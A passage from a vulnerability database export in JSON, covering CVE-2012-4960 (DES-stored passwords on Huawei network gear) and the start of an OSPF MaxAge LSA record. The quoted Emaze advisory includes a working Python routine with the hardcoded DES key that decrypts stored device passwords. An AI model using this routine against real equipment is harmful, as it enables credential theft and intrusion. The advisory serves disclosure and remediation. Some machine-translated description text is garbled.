                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon_usg5300:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r001",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:eudemon1000e-x:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r002",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200e-c:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r003c00",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200x3:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v200r003c00",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200e-x2:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v100r005c01",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:e200e-usg2100:*:*:*:*:*:*:*:*",
                        cpe_name: [],
                        versionEndIncluding: "v100r005c01",
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:nip200:v100r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:h:huawei:nip100:v100r001:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-4960",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Roberto Paleari and Ivan Speziale from Emaze Networks",
      sources: [
         {
            db: "BID",
            id: "56510",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201211-280",
         },
      ],
      trust: 0.9,
   },
   cve: "CVE-2012-4960",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 6.5,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8,
                  impactScore: 6.4,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "NVD",
                  availabilityImpact: "PARTIAL",
                  availabilityRequirement: "NOT DEFINED",
                  baseScore: 6.5,
                  collateralDamagePotential: "LOW-MEDIUM",
                  confidentialityImpact: "PARTIAL",
                  confidentialityRequirement: "NOT DEFINED",
                  enviromentalScore: 5.1,
                  exploitability: "FUNCTIONAL",
                  exploitabilityScore: 8,
                  id: "CVE-2012-4960",
                  impactScore: 6.4,
                  integrityImpact: "PARTIAL",
                  integrityRequirement: "NOT DEFINED",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  remediationLevel: "OFFICIAL FIX",
                  reportConfidence: "CONFIRMED",
                  severity: "MEDIUM",
                  targetDistribution: "MEDIUM",
                  trust: 0.8,
                  userInterationRequired: null,
                  vector_string: "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "Single",
                  author: "NVD",
                  availabilityImpact: "Partial",
                  baseScore: 6.5,
                  confidentialityImpact: "Partial",
                  exploitabilityScore: null,
                  id: "CVE-2012-4960",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "CNVD",
                  availabilityImpact: "PARTIAL",
                  baseScore: 6.5,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8,
                  id: "CNVD-2013-08074",
                  impactScore: 6.4,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:N/AC:L/Au:S/C:P/I:P/A:P",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "SINGLE",
                  author: "VULHUB",
                  availabilityImpact: "PARTIAL",
                  baseScore: 6.5,
                  confidentialityImpact: "PARTIAL",
                  exploitabilityScore: 8,
                  id: "VHN-58241",
                  impactScore: 6.4,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:S/C:P/I:P/A:P",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2012-4960",
                  trust: 2.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2013-08074",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201306-403",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-58241",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CERT/CC",
            id: "VU#948096",
         },
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            db: "VULHUB",
            id: "VHN-58241",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            db: "NVD",
            id: "CVE-2012-4960",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201306-403",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The Huawei NE5000E, MA5200G, NE40E, NE80E, ATN, NE40, NE80, NE20E-X6, NE20, ME60, CX600, CX200, CX300, ACU, WLAN AC 6605, S9300, S7700, S2300, S3300, S5300, S3300HI, S5300HI, S5306, S6300, S2700, S3700, S5700, S6700, AR G3, H3C AR(OEM IN), AR 19, AR 29, AR 49, Eudemon100E, Eudemon200, Eudemon300, Eudemon500, Eudemon1000, Eudemon1000E-U/USG5300, Eudemon1000E-X/USG5500, Eudemon8080E/USG9300, Eudemon8160E/USG9300, Eudemon8000E-X/USG9500, E200E-C/USG2200, E200E-X3/USG2200, E200E-X5/USG2200, E200E-X7/USG2200, E200E-C/USG5100, E200E-X3/USG5100, E200E-X5/USG5100, E200E-X7/USG5100, E200E-B/USG2100, E200E-X1/USG2100, E200E-X2/USG2100, SVN5300, SVN2000, SVN5000, SVN3000, NIP100, NIP200, NIP1000, NIP2100, NIP2200, and NIP5100 use the DES algorithm for stored passwords, which makes it easier for context-dependent attackers to obtain cleartext passwords via a brute-force attack. Huawei networking equipment use a DES encryption algorithm for password and encryption. DES is publicly known to be easily cracked. plural Huawei The product uses the stored password DES Because of the use of the algorithm, a vulnerability exists in which a plaintext password is obtained.Brute force attack by attacker (Brute force attack) You may be able to get a plaintext password via. Huawei is the world's leading provider of information and communication solutions. Huawei Quidway is a series of switches developed by Huawei. The Huawei CX600 is based on Huawei's mature VRP platform and has powerful routing, L2/L3 multicast, 5-level H-QoS, packet buffering, and ACL capabilities. Multiple Huawei products are prone to a weak password encryption weakness. \nSuccessful exploits may allow an attacker to decrypt stored passwords; this may aid in further attacks. \nThe following are vulnerable:\nHuawei Quidway series\nHuawei CX600 V600R001\nHuawei CX600 V600R003C00SPC900\nHuawei ME60 V600R002C07 and prior versions\nAR 19/29/49 R2207 and prior versions. Weak password encryption on Huawei products\n===========================================\n\n[ADVISORY INFORMATION]\nTitle:\t\tWeak password encryption on Huawei products\nRelease date:   13/11/2012\nCredits: \tRoberto Paleari, Emaze Networks (roberto.paleari@emaze.net)\n\t\tIvan Speziale,   Emaze Networks (ivan.speziale@emaze.net)\n\n[VULNERABILITY INFORMATION]\nClass: \t        Information disclosure\n\n[AFFECTED PRODUCTS]\nWe confirm the presence of this security vulnerability on the following\nproducts:\n   * Huawei Quidway series\n   * Huawei CX600\n\nOther models are probably also vulnerable, but they were not checked. As a consequence, passwords extracted from a\nvictim's device can be deciphered instantaneously. \n\nA Python procedure that decodes a given password is included below. Upon\ntermination, procedure decrypt_password() returns the clear-text password. \n\n<cut>\nfrom Crypto.Cipher import DES\n\ndef decode_char(c):\n    if c == 'a':\n        r = '?'\n    else:\n        r = c\n    return ord(r) - ord('!')\n\ndef ascii_to_binary(s):\n    assert len(s) == 24\n\n    out = [0]*18\n    i = 0\n    j = 0\n\n    for i in range(0, len(s), 4):\n        y = decode_char(s[i + 0])\n        y = (y << 6) & 0xffffff\n\n        k = decode_char(s[i + 1])\n        y = (y | k) & 0xffffff\n        y = (y << 6) & 0xffffff\n\n        k = decode_char(s[i + 2])\n        y = (y | k) & 0xffffff\n        y = (y << 6) & 0xffffff\n\n        k = decode_char(s[i + 3])\n        y = (y | k) & 0xffffff\n\n        out[j+2] = chr(y       & 0xff)\n        out[j+1] = chr((y>>8)  & 0xff)\n        out[j+0] = chr((y>>16) & 0xff)\n\n        j += 3\n\n    return \"\".join(out)\n\ndef decrypt_password(p):\n    r = ascii_to_binary(p)\n\n    r = r[:16]\n\n    d = DES.new(\"\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\", DES.MODE_ECB)\n    r = d.decrypt(r)\n\n    return r.rstrip(\"\\x00\")\n</cut>\n\n\n[REMEDIATION] \nWe recommend to store passwords using a proper hashing algorithm, instead of\nleveraging symmetric encryption. Further details are available at the following URL:\nhttp://support.huawei.com/enterprise/ReadLatestNewsAction.action?contentId=NEWS1000001141\n\n[COPYRIGHT]\nCopyright(c) Emaze Networks S.p.A 2012, All rights reserved worldwide. \nPermission is hereby granted to redistribute this advisory, providing that no\nchanges are made and that the copyright notices and disclaimers remain intact. \n\n[DISCLAIMER]\nEmaze Networks S.p.A is not responsible for the misuse of the information\nprovided in our security advisories. These advisories are a service to the\nprofessional security community. There are NO WARRANTIES with regard to this\ninformation. Any application or distribution of this information constitutes\nacceptance AS IS, at the user's own risk. This information is subject to change\nwithout notice",
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-4960",
         },
         {
            db: "CERT/CC",
            id: "VU#948096",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
         {
            db: "BID",
            id: "56510",
         },
         {
            db: "VULHUB",
            id: "VHN-58241",
         },
         {
            db: "PACKETSTORM",
            id: "118054",
         },
      ],
      trust: 3.87,
   },
   exploit_availability: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            reference: "https://www.scap.org.cn/vuln/vhn-58241",
            trust: 0.1,
            type: "unknown",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-58241",
         },
      ],
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2012-4960",
            trust: 4.2,
         },
         {
            db: "CERT/CC",
            id: "VU#948096",
            trust: 2.7,
         },
         {
            db: "BID",
            id: "56510",
            trust: 1.6,
         },
         {
            db: "JVN",
            id: "JVNVU90202792",
            trust: 0.8,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-006004",
            trust: 0.8,
         },
         {
            db: "PACKETSTORM",
            id: "118054",
            trust: 0.7,
         },
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
            trust: 0.6,
         },
         {
            db: "CNVD",
            id: "CNVD-2012-6517",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201211-280",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201306-403",
            trust: 0.6,
         },
         {
            db: "EXPLOIT-DB",
            id: "38020",
            trust: 0.1,
         },
         {
            db: "VULHUB",
            id: "VHN-58241",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CERT/CC",
            id: "VU#948096",
         },
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
         {
            db: "VULHUB",
            id: "VHN-58241",
         },
         {
            db: "BID",
            id: "56510",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            db: "PACKETSTORM",
            id: "118054",
         },
         {
            db: "NVD",
            id: "CVE-2012-4960",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201211-280",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201306-403",
         },
      ],
   },
   id: "VAR-201306-0006",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
         {
            db: "VULHUB",
            id: "VHN-58241",
         },
      ],
      trust: 2.164663294642857,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 1.2,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
      ],
   },
   last_update_date: "2023-12-18T13:44:36.277000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Huawei-SA-20120827-01-CX600",
            trust: 0.8,
            url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm",
         },
         {
            title: "Huawei multiple product encryption is not a strong vulnerability patch",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/34800",
         },
         {
            title: "Huawei patch for multiple product password encryption vulnerabilities",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/25088",
         },
         {
            title: "Huawei Fixing measures for vulnerabilities of encryption problems in many products",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=170984",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201306-403",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-310",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-58241",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            db: "NVD",
            id: "CVE-2012-4960",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.3,
            url: "http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-u_194373.htm",
         },
         {
            trust: 1.9,
            url: "http://www.kb.cert.org/vuls/id/948096",
         },
         {
            trust: 0.8,
            url: "about vulnerability notes",
         },
         {
            trust: 0.8,
            url: "contact us about this vulnerability",
         },
         {
            trust: 0.8,
            url: "provide a vendor statement",
         },
         {
            trust: 0.8,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-4960",
         },
         {
            trust: 0.8,
            url: "http://jvn.jp/cert/jvnvu90202792/index.html",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-4960",
         },
         {
            trust: 0.6,
            url: "http://packetstormsecurity.org/files/118054/huawei-weak-password-encryption.html",
         },
         {
            trust: 0.6,
            url: "http://www.securityfocus.com/bid/56510",
         },
         {
            trust: 0.4,
            url: "http://support.huawei.com/enterprise/readlatestnewsaction.action?contentid=news1000001141",
         },
         {
            trust: 0.3,
            url: "http://www.huawei.com/",
         },
         {
            trust: 0.3,
            url: "msg://bugtraq/201211130911.qad9ba1q022014@sf01web1.securityfocus.com",
         },
      ],
      sources: [
         {
            db: "CERT/CC",
            id: "VU#948096",
         },
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
         {
            db: "VULHUB",
            id: "VHN-58241",
         },
         {
            db: "BID",
            id: "56510",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            db: "PACKETSTORM",
            id: "118054",
         },
         {
            db: "NVD",
            id: "CVE-2012-4960",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201211-280",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201306-403",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CERT/CC",
            id: "VU#948096",
         },
         {
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
         {
            db: "VULHUB",
            id: "VHN-58241",
         },
         {
            db: "BID",
            id: "56510",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            db: "PACKETSTORM",
            id: "118054",
         },
         {
            db: "NVD",
            id: "CVE-2012-4960",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201211-280",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201306-403",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2013-08-05T00:00:00",
            db: "CERT/CC",
            id: "VU#948096",
         },
         {
            date: "2013-06-25T00:00:00",
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            date: "2012-11-16T00:00:00",
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
         {
            date: "2013-06-20T00:00:00",
            db: "VULHUB",
            id: "VHN-58241",
         },
         {
            date: "2012-11-13T00:00:00",
            db: "BID",
            id: "56510",
         },
         {
            date: "2013-06-24T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            date: "2012-11-13T23:22:55",
            db: "PACKETSTORM",
            id: "118054",
         },
         {
            date: "2013-06-20T15:55:00.897000",
            db: "NVD",
            id: "CVE-2012-4960",
         },
         {
            date: "2012-11-16T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201211-280",
         },
         {
            date: "2013-06-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201306-403",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2013-10-03T00:00:00",
            db: "CERT/CC",
            id: "VU#948096",
         },
         {
            date: "2013-07-01T00:00:00",
            db: "CNVD",
            id: "CNVD-2013-08074",
         },
         {
            date: "2012-11-16T00:00:00",
            db: "CNVD",
            id: "CNVD-2012-6517",
         },
         {
            date: "2013-08-22T00:00:00",
            db: "VULHUB",
            id: "VHN-58241",
         },
         {
            date: "2015-03-19T08:28:00",
            db: "BID",
            id: "56510",
         },
         {
            date: "2013-08-09T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-006004",
         },
         {
            date: "2013-08-22T03:59:17.713000",
            db: "NVD",
            id: "CVE-2012-4960",
         },
         {
            date: "2012-12-05T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201211-280",
         },
         {
            date: "2021-11-24T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201306-403",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201211-280",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201306-403",
         },
      ],
      trust: 1.2,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Huawei networking equipment weak password cipher",
      sources: [
         {
            db: "CERT/CC",
            id: "VU#948096",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "encryption problem",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201211-280",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201306-403",
         },
      ],
      trust: 1.2,
   },
}

var-201711-0985
Vulnerability from variot

AC6005 V200R006C10SPC200,AC6605 V200R006C10SPC200,AR1200 with software V200R005C10CP0582T, V200R005C10HP0581T, V200R005C20SPC026T,AR200 with software V200R005C20SPC026T,AR3200 V200R005C20SPC026T,CloudEngine 12800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 5800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 6800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 7800 with software V100R003C00, V100R005C00, V100R005C10, V100R006C00, V200R001C00,CloudEngine 8800 with software V100R006C00, V200R001C00,E600 V200R008C00,S12700 with software V200R005C00, V200R006C00, V200R007C00, V200R008C00,S1700 with software V100R006C00, V100R007C00, V200R006C00,S2300 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S2700 with software V100R005C00, V100R006C00, V100R006C03, V100R006C05, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R005C01, V200R005C02, V200R005C03, V200R006C00, V200R007C00, V200R008C00,S5300 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S5700 with software V100R005C00, V100R006C00, V100R006C01, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S6300 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R008C00,S6700 with software V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R003C02, V200R003C10, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S7700 with software V100R003C00, V100R006C00, V200R001C00, V200R001C01, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,S9300 with software V100R001C00, V100R002C00, V100R003C00, V100R006C00, V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00, V200R008C10,S9700 with software V200R001C00, V200R002C00, V200R003C00, V200R005C00, V200R006C00, V200R007C00, V200R008C00,Secospace USG6600 V500R001C00SPC050 have a MaxAge LSA vulnerability due to improper OSPF implementation. When the device receives special LSA packets, the LS (Link Status) age would be set to MaxAge, 3600 seconds. An attacker can exploit this vulnerability to poison the route table and launch a DoS attack. plural Huawei The product contains an input validation vulnerability.Service operation interruption (DoS) There is a possibility of being put into a state. HuaweiAC6005 and other products are all products of China Huawei. HuaweiAC6005 is an access control device. The CloudEngine 12800 is a data center switch device. The OSPF protocol of several Huawei products has a MaxAgeLSA vulnerability. The following products and versions are affected: Huawei AC6005 V200R006C10SPC200 Version; AC6605 V200R006C10SPC200 Version; AR1200 V200R005C10CP0582T Version, V200R005C10HP0581T Version, V200R005C20SPC026T Version; AR200 V200R005C20SPC026T Version; AR3200 V200R005C20SPC026T Version; CloudEngine 12800 V100R003C00 Version, V100R005C00 Version, V100R005C10 Version, V100R006C00 Version, V200R001C00 Version; CloudEngine 5800 V100R003C00 Version, V100R005C00 Version, V100R005C10 Version, V100R006C00 Version, V200R001C00 Version; CloudEngine 6800 V100R003C00 Version, V100R005C00 Version, V100R005C10 Version, V100R006C00 Version, V200R001C00 Version; CloudEngine 7800 V100R003C00 Version, V100R005C00 Version, V100R005C10 Version, V100R006C00 Version, V200R001C00 Version; CloudEngine 8800 V100R006C00, V200R001C00; E600 V200R008C00; S12700 V200R005C00, V200R006C00, V200R007C00, V200R008C00; S1700

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201711-0985",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r002c00",
         },
         {
            model: "secospace usg6600",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v500r001c30",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r001c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r005c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r008c00",
         },
         {
            model: "s9700",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v200r007c00",
         },
         {
            model: "secospace usg6600",
            scope: "eq",
            trust: 1.6,
            vendor: "huawei",
            version: "v500r001c00",
         },
         {
            model: "s9700",
            scope: "eq",
